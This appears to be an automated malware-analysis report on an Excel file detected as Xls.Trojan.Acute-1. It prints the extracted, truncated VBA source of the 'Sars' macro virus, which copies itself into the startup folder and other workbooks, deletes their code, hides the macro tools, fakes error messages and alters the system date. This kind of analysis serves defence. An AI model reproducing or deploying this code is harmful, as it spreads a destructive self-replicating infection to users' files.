MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically an Auto_Open macro, which is a common technique for initial execution. The macro attempts to create a directory and displays a truncated message box, suggesting it's part of a downloader or dropper mechanism. The ClamAV detection as 'Xls.Trojan.Acute-1' further confirms its malicious nature. The presence of an Auto_Open macro strongly suggests it was delivered as a spearphishing attachment.
Heuristics (3)
- ClamAV: Xls.Trojan.Acute-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Acute-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4819 bytes |

SHA-256: b84857024f133fe1806e5ba45a1ab69621aa545838ece10400874a375e9d8e0b
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sars"
' Sars virus!
' Bandung, Indonesian
' Tonk sok Sars nyieunan macro, lah...
'
Public Const Micro = "Sars"
Public Const Data0 = Micro & ".xls"
Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly."
Sub CkAgain()
Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim bg As Object
    Dim po As Object
    On Error Resume Next
    For Each j In Workbooks
        Set bg = Workbooks(j.Name)
        For Each boom In bg.VBProject.VBComponents
            If boom.Type = 100 Then
                If boom.Name = Micro Then
                    MsgBox "Good morning"
                End If
            Else
                Set bck = boom.codemodule
                If bck.CountOflines = 0 Then MsgBox "HELLO"
            End If
        Next boom
    Next j
End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim Ct As Object
    Dim bg As Object
    Dim bgc As Object
    Dim bck As Object
    Dim xlsz As Object
    Dim Ck As Boolean
    On Error Resume Next
    KillStart
    With Application
        If WeekDay(Now) Mod 2 = A Then
            .Caption = "~~Fakir Meng_"
        Else
            .Caption = "~~Fakir Meng_"
        End If
        If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart"
        If Day(Date) = 20 Then
            MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro
            Date = Now + 1
        End If
        .ScreenUpdating = False
        .EnableCancelKey = xlDisabled
        If Day(Date) Mod 2 = 0 Then
            .OnTime Now + TimeValue("1"), "SarsWordArt"
        End If
        If Dir(.StartupPath & "\" & Data0) = "" Then
            ActiveWorkbook.SaveAs .StartupPath & "\" & Data0
        End If
        If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then
            Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1"
        End If
        Set bg = ActiveWorkbook
        .OnKey "%{F12}", "Sars.Cr"
        .OnKey "%{F8}", "Sars.Cr"
        .OnKey "%{F11}", "Sars.Cr"
        .CommandBars("Window").Controls("Unhide...").Enabled = False
        .CommandBars("Tools").Controls("Macro").Delete
        .OnSheetActivate = "Sars.xls!auto_Open"
        Workbooks(Data0).Windows.Item(1).Visible = False
        CkAgain
        If Dir(.Path & "\Wintlb32.dll") = "" Then
            Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll"
        End If
        For Each boom In bg.VBProject.VBComponents
            If boom.Type <> 100 Then
                If boom.Name <> Micro Then
                    bg.VBProject.VBComponents.Remove boom
                End If
            Else
                Set bck = boom.codemodule
                If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
            End If
        Next boom
        For Each xlsz In bg.VBProject.VBComponents
            If xlsz.Name = Micro Then Ck = True: Exit For
        Next xlsz
        If Ck = False Then
            Set Ct = bg.VBProject.VBComponents
            Ct.Import .Path & "\Wintlb32.dll"
            Kill .Path & "\Wintlb32.dll"
            Workbooks(Data0).Save
            If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save
        End If
    End With
End Sub
Sub Cr(): MsgBox Data1, 16, "Microsoft Visual Basic": End Sub
Attribute Cr.VB_ProcData.VB_Invoke_Func = " \n14"
Sub SarsWordArt()
Attribute SarsWordArt.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    ActiveSheet.Shapes.AddTextEffect(msoTextEffect16, Micro, "Arial Black", _
    36#, msoFalse, msoFalse, 205.5, 118.5).Select
    Range("A1").Select
End Sub
Sub KillStart()
Attribute Kill
... (truncated)
```